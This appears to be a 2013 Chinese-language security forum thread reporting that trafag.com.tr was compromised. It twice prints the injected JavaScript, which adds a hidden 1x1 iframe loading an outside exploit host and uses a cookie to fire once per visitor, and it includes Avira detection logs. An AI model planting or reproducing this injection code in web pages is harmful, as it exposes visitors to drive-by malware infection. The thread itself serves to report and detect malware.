http://www.trafag.com.tr/

显示全部楼层 · 发表于 2013-7-29 06:43:00

function zzzfff() {
var mciyb = document.createElement('iframe');
mciyb.src = 'http://ricerko.it/NewsLocali/rel.php';
mciyb.style.position = 'absolute';
mciyb.style.border = '0';
mciyb.style.height = '1px';
mciyb.style.width = '1px';
mciyb.style.left = '1px';
mciyb.style.top = '1px';
if (!document.getElementById('mciyb')) {
document.write('<div id=\'mciyb\'></div>');
document.getElementById('mciyb').appendChild(mciyb);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

function zzzfff() {
var rgtap = document.createElement('iframe');
rgtap.src = 'http://ricerko.it/NewsLocali/rel.php';
rgtap.style.position = 'absolute';
rgtap.style.border = '0';
rgtap.style.height = '1px';
rgtap.style.width = '1px';
rgtap.style.left = '1px';
rgtap.style.top = '1px';
if (!document.getElementById('rgtap')) {
document.write('<div id=\'rgtap\'></div>');
document.getElementById('rgtap').appendChild(rgtap);
}
}
function SetCookie(cookieName, cookieValue, nDays, path) {
var today = new Date();
var expire = new Date();
if (nDays == null || nDays == 0) nDays = 1;
expire.setTime(today.getTime() + 3600000 * 24 * nDays);
document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}
function GetCookie(name) {
var start = document.cookie.indexOf(name + "=");
var len = start + name.length + 1;
if ((!start) && (name != document.cookie.substring(0, name.length))) {
return null;
}
if (start == -1) return null;
var end = document.cookie.indexOf(";", len);
if (end == -1) end = document.cookie.length;
return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
if (GetCookie('visited_uq') == 55) {} else {
SetCookie('visited_uq', '55', '1', '/');
zzzfff();
}
}

复制代码

Avira

2013/7/29 上午 06:39 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVPGMUFA\shared[1].js'
   包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
   已採取動作：
   檔案會移動至 '54b13eb1.qua' 名稱底下的隔離區目錄。.

2013/7/29 上午 06:39 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\81REZ51I\wz_tooltip[1].js'
   包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
   已採取動作：
   檔案會移動至 '4c241128.qua' 名稱底下的隔離區目錄。.

2013/7/29 上午 06:39 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 759
   目錄數： 0
   惡意程式碼數： 2
   警告數： 0

2013/7/29 上午 06:39 [System Scanner] 發現惡意程式碼
   檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\95TAM12D\trafag_com_tr[1].htm'
   包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
   已採取動作：
   檔案會移動至 '54493d7b.qua' 名稱底下的隔離區目錄。.

2013/7/29 上午 06:39 [System Scanner] 掃描
   掃描結束 [已完成全部的掃描。]。
   檔案數： 758
   目錄數： 0
   惡意程式碼數： 1
   警告數： 0

2013/7/29 上午 06:39 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVPGMUFA\shared[1].js 中
   偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
   執行的動作：傳輸至掃描程式

2013/7/29 上午 06:39 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\AVPGMUFA\shared[1].js 中
   偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
   執行的動作：拒絕存取

2013/7/29 上午 06:39 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\81REZ51I\wz_tooltip[1].js 中
   偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
   執行的動作：傳輸至掃描程式

2013/7/29 上午 06:39 [Web Protection] 發現惡意程式碼
   從 URL "http://www.trafag.com.tr/includes/shared.js" 存取資料時，
   發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
   已採取動作：已略過

2013/7/29 上午 06:39 [Web Protection] 發現惡意程式碼
   從 URL "http://www.trafag.com.tr/includes/wz_tooltip.js" 存取資料時，
   發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
   已採取動作：已略過

2013/7/29 上午 06:39 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\95TAM12D\trafag_com_tr[1].htm 中
   偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
   執行的動作：傳輸至掃描程式

2013/7/29 上午 06:39 [Real-Time Protection] 發現惡意程式碼
   在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
   Files\Low\Content.IE5\95TAM12D\trafag_com_tr[1].htm 中
   偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
   執行的動作：拒絕存取

2013/7/29 上午 06:39 [Web Protection] 發現惡意程式碼
   從 URL "http://www.trafag.com.tr/" 存取資料時，
   發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
   已採取動作：已略過

显示全部楼层 · 发表于 2013-7-29 13:11:34

Ashampoo_Snap_2013.07.29_13h07m13s_001_.png

显示全部楼层 · 发表于 2013-7-29 14:32:17

[已鉴定] http://www.trafag.com.tr/